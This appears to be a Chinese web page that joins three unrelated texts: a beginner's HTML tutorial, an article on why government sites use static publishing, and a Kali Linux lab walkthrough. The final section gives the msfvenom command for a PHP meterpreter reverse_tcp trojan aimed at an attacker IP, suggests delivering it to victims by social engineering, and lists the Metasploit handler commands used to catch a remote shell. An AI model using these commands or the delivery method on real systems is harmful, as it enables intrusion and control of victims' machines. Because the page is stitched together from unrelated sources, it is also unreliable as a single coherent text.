整合營銷服務商
電腦端+手機端+微信端=數據同步管理
免費咨詢熱線:
電腦端+手機端+微信端=數據同步管理
免費咨詢熱線:
伙伴們,好幾天不見了,這一周菜鳥小白工作很忙,所以沒有每天更新學習內容,但是菜鳥小白的學習是沒有停下來的,只是沒有時間來整理學習筆記了。現在就將菜鳥小白這兩天學習的HTML基礎和大家分享,其中還會拿一些標簽進行舉例,顯示效果。
HTML語言是一種標簽語言,它不需要編譯,可以直接由瀏覽器執行。在標準網頁設計中HTML負責填充網頁的內容,HTML編寫的超文本文檔(文件)稱之為HTML文檔(網頁),它包含了一些html元素,使用html或者htm為文件名后綴,能獨立于各種操作系統平臺,如Unix、Windows等
標準的html文檔是由標簽和要顯示在網頁上的內容組成。HTML用于描述功能的符號成為“標簽”,如<html>、<body>、<table>等。HTML標簽規定HTML文檔的邏輯結構,并且控制文檔的顯示格式,然后由瀏覽器來負責解釋并顯示頁面。通過使用標簽可以區分文本文件的各個組成部分,對頁面上的文字、表格、圖片等多媒體數據所出現的位置、形式、順序及網頁間的超鏈接關系進行設定。
標簽都是封裝在一對尖括號“<……>”之中。標簽只改變網頁的顯示方式,本身不會顯示在窗口中。HTML文檔中最先出現的標簽是<html>標簽。<html>標簽是文檔標識符,它是成對出現的,首標簽<html>和尾標簽</html>分別位于文檔的最前面和最后面,明確地表示文檔是以超文本標識語言(HTML)編寫的。該標簽不帶任何屬性
<html>……</html>之間有如下標簽:
head是英文“頭”的意思。習慣上用戶把HTML文檔分為文檔頭和文檔主體兩部分。文檔主體部分就是在web瀏覽器窗口的用戶區內看到的內容,而文檔頭部分用來規定該文檔的標題(出現在web瀏覽器窗口的標題欄中)和文檔的一些屬性。<head>標簽對的作用就是控制文檔的頭部信息。中間可以使用<title>……</title>、<script>……</script>標簽對,在此標簽中間可以HTML文檔的標簽是可以嵌套的,即在一對標簽中可以嵌入另外一對子標簽,用來規定母標簽所含范圍的屬性或其中某一部分內容,嵌套在<head>……</head>標簽對中使用的主要有<title>標簽
<html lang="zh-cn">
<head>
<meta content="text/html;charset=utf-8">
菜鳥小白的學習分享
</head>
</html>
保存為HTML文件后顯示如下:
<title>標簽是成對出現的,用以規定HTML文檔的標題。在<title>……</title>之間的內容將顯示在web瀏覽器窗口的標題欄中。另外,<title>……</title>標簽對只能放在<head>……</head>標簽對之間,而且其內部不能包含其它標簽。
<html lang="zh-cn">
<head>
<meta content="text/html;charset=utf-8">
<title>菜鳥小白的學習分享</title>
</head>
</html>
修改后顯示如下:
<body>標簽也是成對出現的。在<body>……</body>之間的內容將顯示在web瀏覽器窗口的用戶區內,它是HTML文檔的主體部分。可以把HTML文檔的主體區域簡單地理解成標題以外的所有部分,該部分可以包含<table>、<font>、<img>、<div>等標簽。結束標簽</body>指明主體區域的結尾,在<body>中可以規定整個文檔的一些基本屬性:
我們驗證了前兩個屬性
<html lang="zh-cn">
<head>
<meta content="text/html;charset=utf-8">
<title>菜鳥小白的學習分享</title>
</head>
<body bgcolor="11ffff" text="000000">
測試內容
?
</body>
</html>
顯示效果如下:
在html中有許多特殊字符需要處理,例如:“<”、">"這兩個符號本身是用來表示標簽的開始和結束的,是沒有辦法通過直接打出來的,必須輸入編碼表示法:“<”和“>”。
通常情況下html會自動截取多余的空格。不管你加多少個空格,都被看做一個空格。如果要顯示多個空格,可以使用 表示空格
我們看看實現代碼
<html lang="zh-cn">
<head>
<meta content="text/html;charset=utf-8">
<title>菜鳥小白的學習分享</title>
</head>
?
<body bgcolor="11ffff" text="000000">
<測試內容> 空格在中間 看到了吧
?
</body>
</html>
顯示效果:
在瀏覽器中控制文本對象的顯示,包括段落、換行、水平線等標簽,下面介紹幾個常用的html格式標簽。所有的格式標簽全部都是在嵌套在<body>……</body>標簽對之間的
全稱paragraph。<p>……</p>標簽對用于創建一個段落,支持align屬性來設置對齊方式,語法如下:
<html lang="zh-cn">
<head>
<meta content="text/html;charset=utf-8">
<title>菜鳥小白的學習分享</title>
</head>
?
<body bgcolor="11ffff" text="000000">
<p align="center"><測試內容> 空格在中間 看到了吧</p>
?
</body>
</html>
顯示效果:
在不另起一段的情況下將當前文本強制換行,<br>標簽屬于單獨出現的標簽,禁止出現結束標簽。
<html lang="zh-cn">
<head>
<meta content="text/html;charset=utf-8">
<title>菜鳥小白的學習分享</title>
</head>
?
<body bgcolor="11ffff" text="000000">
<p align="center"><測試內容></br> 空格在中間 看到了吧</p>
?
</body>
</html>
顯示效果:
可以完整保留設計者在源文件中所定義的格式,包含各種空格,縮進,以及其他特殊字符,全部都原封不動的展示在瀏覽器頁面上。
<html lang="zh-cn">
<head>
<meta content="text/html;charset=utf-8">
<title>菜鳥小白的學習分享</title>
</head>
?
<body bgcolor="11ffff" text="000000">
<p align="center"><測試內容></br> 空格在中間 看到了吧</p>
<pre>
我是菜鳥小白
你們的好朋友
?
讓我們一起學習吧!!!
</pre>
?
</body>
</html>
顯示效果:
主要分為無序列表、排序列表、目錄列表、菜單列表和描述性列表五種類型
<html lang="zh-cn">
<head>
<meta content="text/html;charset=utf-8">
<title>菜鳥小白的學習分享</title>
</head>
?
<body bgcolor="11ffff" text="000000">
<ul>
<li>我是菜鳥小白</li>
<li>你們的好朋友</li>
?
<li> 讓我們一起學習吧!!!</li>
</ul>
?
</body>
</html>
效果如下:
?描述性列表:
<html lang="zh-cn">
<head>
<meta content="text/html;charset=utf-8">
<title>菜鳥小白的學習分享</title>
</head>
?
<body bgcolor="11ffff" text="000000">
<dl>
<dt>菜鳥小白測試表頭</dt>
<dd>我是菜鳥小白</dd>
<dd>你們的好朋友</dd>
<dd> 讓我們一起學習吧!!!</dd>
<dt>菜鳥小白測試表頭2</dt>
<dd>我是菜鳥小白</dd>
<dd>你們的好朋友</dd>
<dd> 讓我們一起學習吧!!!</dd>
</dl>
?
</body>
</html>
顯示效果如下:
?
好了,今天的內容就到這了,我們明天繼續學習HTML基礎內容,不見不散~
輯導語:我們可以發現很多政府網站基本都是選擇靜態發布的,這是因為靜態發布能夠更好的保證網站的速度以及安全性等等,政府網站這類對安全性要求較高的網站多會選擇靜態發布;本文作者分享了關于政府網站選擇靜態發布的原因,我們一起來了解一下。
今年過了年接手了政府網站建設相關的產品工作,發現和以往產品最大的不同是,政府網站建設用的是靜態發布,以前做的移動產品都是動態的。那么政府網站為什么一般都選擇靜態發布呢?今天就來總結分析下。
靜態與動態是相對來說的,靜態網頁就是我們常見的以.htm、.html、.shtml等后綴結尾的頁面。
通常靜態網頁的制作流程是:
第一步:發布信息到數據庫
第二步:選擇頁面的模板
第三步:程序讀取模板+數據庫信息=靜態頁面
第四步:發布索引頁面(如首頁、引導頁等)
靜態頁面的生成至少需要上述幾個步驟才能完成。
靜態網站設計所采用的的技術原理是一對一的形式,也就是說在這樣的網站上面,一個內容對應的就是一個頁面,對應服務器上的一個文件;所以靜態網站可以簡單理解為純粹就是幾個制作好的頁面而已。
網頁在設計好并上傳到服務器后,就不能對網站的內容進行修改了,除非把網站文件下載下來,用專業的網站制作軟件修改編輯好后再次上傳;所以在靜態頁面的制作中,模板是關鍵,因為一旦想要調整頁面,必須再次創建,而如果數據量大的話,那么這個更新時間將相當可怕。
另外,靜態頁面不需要與數據庫通信,無論網站訪問者如何操作,都只是讓服務器把固有的數據傳送給請求者,沒有腳本計算和后臺數據庫讀取的過程。
最后補充一下,URL相對動態網站來說也比較清晰,如,product.html。
因為靜態網站沒有其他程序和數據讀取,因此靜態網站打開速度相對比較快。
動態網頁網址中動態參數太多,而且鏈接過長,而靜態網頁則相反,因此靜態網頁比動態網頁更受搜索引擎歡迎。
再加上靜態頁面打開速度快、網站URL標準化程度高、網站簡潔、網站用戶體驗度好,使得靜態網頁更容易被搜索引擎所收錄。
因為靜態頁面都是純html格式的文件,所以不管黑客使用什么樣的手段都無法直接對網站進行攻擊,所以在網站安全性方面,靜態頁面是做的最好、最安全的一種方式。
因為靜態頁面無法在調整后自動更新,不能直接對網站內容進行修改,所以如果要調整頁面,必須再次創建,維護操作十分繁瑣。
雖然靜態頁面不需要對數據進行不斷讀取,但是在生產靜態頁面的時候,程序需要對服務器進行創建文件夾、創建html文件、刪除文件等操作,所以如果網站存在上萬篇文章,那么每生成一次靜態文件,就會對網站服務器帶來很大壓力,而且也無形地增加空間占用率。
靜態頁面由于受其特性影響,無法實現會員注冊、在線留言等功能,只能簡單地以信息展示為主。
動態網站是先從數據庫里面獲取數據,然后再按一個格式顯示出來,也就是說只需要一個顯示頁面內容的框架,就可以把成千上萬的網頁顯示出來了,所以動態網站對服務器空間要求很小。
動態網站內容可以實時更新,而且與用戶交互性強,比如一些論壇、注冊、在線聊天頁面都是動態的。
另外,動態網站由于每次加載一個新的頁面,都需要與后臺數據庫通信,所以加載速度會稍慢一些。
在URL方面,動態網站URL可能會帶有參數。
動態網站的開發語言主要有:ASP、JSP、PHP、ASP.NET,早期最普遍的是ASP開發的網站,現在主流網站開發語言是PHP、ASP.NET。這些程序都要使用數據庫才能完成動態操作。數據庫常用的有:ACCESS、MYSQL、MSSQL、ORACLE等。
由于動態頁面可以通過網站程序直接調用大量數據直接展示到網站前臺,因此動態頁面對網站服務器產生的壓力相對較小。
但是由于動態頁面需要不斷的調用數據庫中的數據,所以對數據庫的要求還是比較大的,而且頻繁的調用讀取會增加數據庫的負擔,嚴重情況有可能會導致數據庫崩潰現象。
動態網站由于可以實時修改更新,因此維護方便,同時由于可以存儲大量數據,所以在需要時可以立即查詢。
搜索引擎的算法受網站安全性、網站打開速度、網站URL對用戶的體驗度等影響,使得搜索引擎對動態頁面賦予的權重值和信任度相對較低。
由于動態頁面網站的URL參數和網站目錄結構都是很明顯的暴露在瀏覽器上面的,所以很多黑客可以通過修改網站的URL參數從而獲得網站的shell權限,進入后臺拿到管理員賬號密碼,對網站進行非法操作,因此動態網站的安全性較低。
除此之外,因為動態網站會用到數據庫,所以對數據庫的安全和保密性要求較高,要專業技術人員提供維護才能保證網絡安全。
偽靜態本身其實就是動態網頁,只不過是被轉換重寫成了靜態網頁,此時通過瀏覽器訪問的地址和真的靜態頁面沒有區別。
當考慮搜索引擎優化SEO時,可以將動態頁面通過服務器處理成靜態頁面,比如論壇帖子頁面,都是經過偽靜態處理成靜態頁面。
但是偽靜態不是真實地址,到底要顯示哪個頁面也就不能直接指定,而要由CPU來判斷,所以CPU占有量的上升是偽靜態最大的弊病。
總之,為了SEO,網站可以選擇偽靜態,但是為了避免CPU超負荷,可以少量使用偽靜態,甚至可以只在專門提供給SEO的Archiver中使用偽靜態。
當然,現在也有越來越多的網站采用動靜結合的方式,因此可根據具體需求及實際情況來選擇不同的技術方案。
作者:王山而,喜歡讀書、喜歡研究用戶心理,坐標:北京。公眾號:小2在思考
本文由@王山而 原創發布于人人都是產品經理,未經許可,禁止許可。
題圖來自 unsplash,基于CCO協議
、背景介紹
1.安裝好 Win7的虛擬機一臺
2.整裝待發的小白一個。
3.安裝好的Kali Linux虛擬機一臺。
3.1 將受害者主機(Windows7)跟攻擊者主機(Kali Linux)的網絡模式全部設置為NAT模式,如下圖所示。
步驟:打開虛擬機的設置/選擇網絡適配器/選擇NAT模式。
3.2 查看實驗的兩臺主機的IP地址,如下圖所示。
命令:ifconfig
3.3 利用“msfvenom”木馬生成工具生成對應的木馬文件,如下圖所示。
步驟1:msfvenom工具的參數介紹
-p, –payload < payload> 指定需要使用的payload(攻擊荷載)。也可以使用自定義payload,幾乎是支持全平臺的
-o, –out < path> 指定創建好的payload的存放位置。
-h, –help 查看幫助選項。
步驟2:利用msfvenom工具生成對應的木馬文件,如下圖所示。
命令:msfvenom -p 指定需要使用的payload(攻擊荷載) lhost=攻擊者主機IP -f exe > 生成木馬文件的保存位置
例子:msfVenom -p php/meterpreter/reverse_tcp lhost=192.168.78.168 lport=4444 -r raw > /root/hack.php
步驟3:在已知的木馬文件保存路徑目錄下查找對應的木馬文件是否已經生成,如下圖所示,木馬文件已經存在(這里使用圖形化文件管理系統來查看,你也可以利用ls命令查看對應路徑下面是否已經生成對應的木馬文件)。
3.4 利用一定的社會工程學方法將生成的木馬文件發送到目標受害者主機,并且在受害者主機進行運行(對應的社會工程學知識請持續關注本號,后續講解),如下圖所示。
3.5 安裝“phpstudy集成環境”,如下圖所示。
步驟1:打開“phpstudy”官網選擇與你電腦系統相對應的軟件版本下載。
步驟2:安裝注意事項
1. 安裝路徑不能包含“中文”或者“空格”,否則會報錯(例如錯誤提示:Can't change dir to 'G:\x65b0\x5efa\x6587\)
2. 保證安裝路徑是純凈的,安裝路徑下不能有已安裝的V8版本,若重新安裝,請選擇其它路徑
步驟3:phpstudy官方使用教程,需者自取。
網址:https://www.php.cn/course/1066.html
3.6 安裝好對應的軟件后,啟動phpstudy中的環境,如下圖所示。
步驟1:點擊相應的環境旁邊的啟動按鈕啟動即可。
步驟2:進入apache服務,如下圖所示。
3.7 將對應的木馬文件上傳到apache服務的www目錄下,如下圖所示。
3.8 啟動Metasploit(msf)滲透框架,如下圖所示。
命令1:msfconsole
命令2:use exploit/multi/handler
命令3:set payload php/meterpreter/reverse_tcp
命令4:show options
命令5:set lhost 192.168.78.168
命令6:run(啟動攻擊模塊)
3.9 拿到目標主機服務器的shell,如下圖所示。
命令:shell進入shell頁面。
*請認真填寫需求信息,我們會在24小時內與您取得聯系。
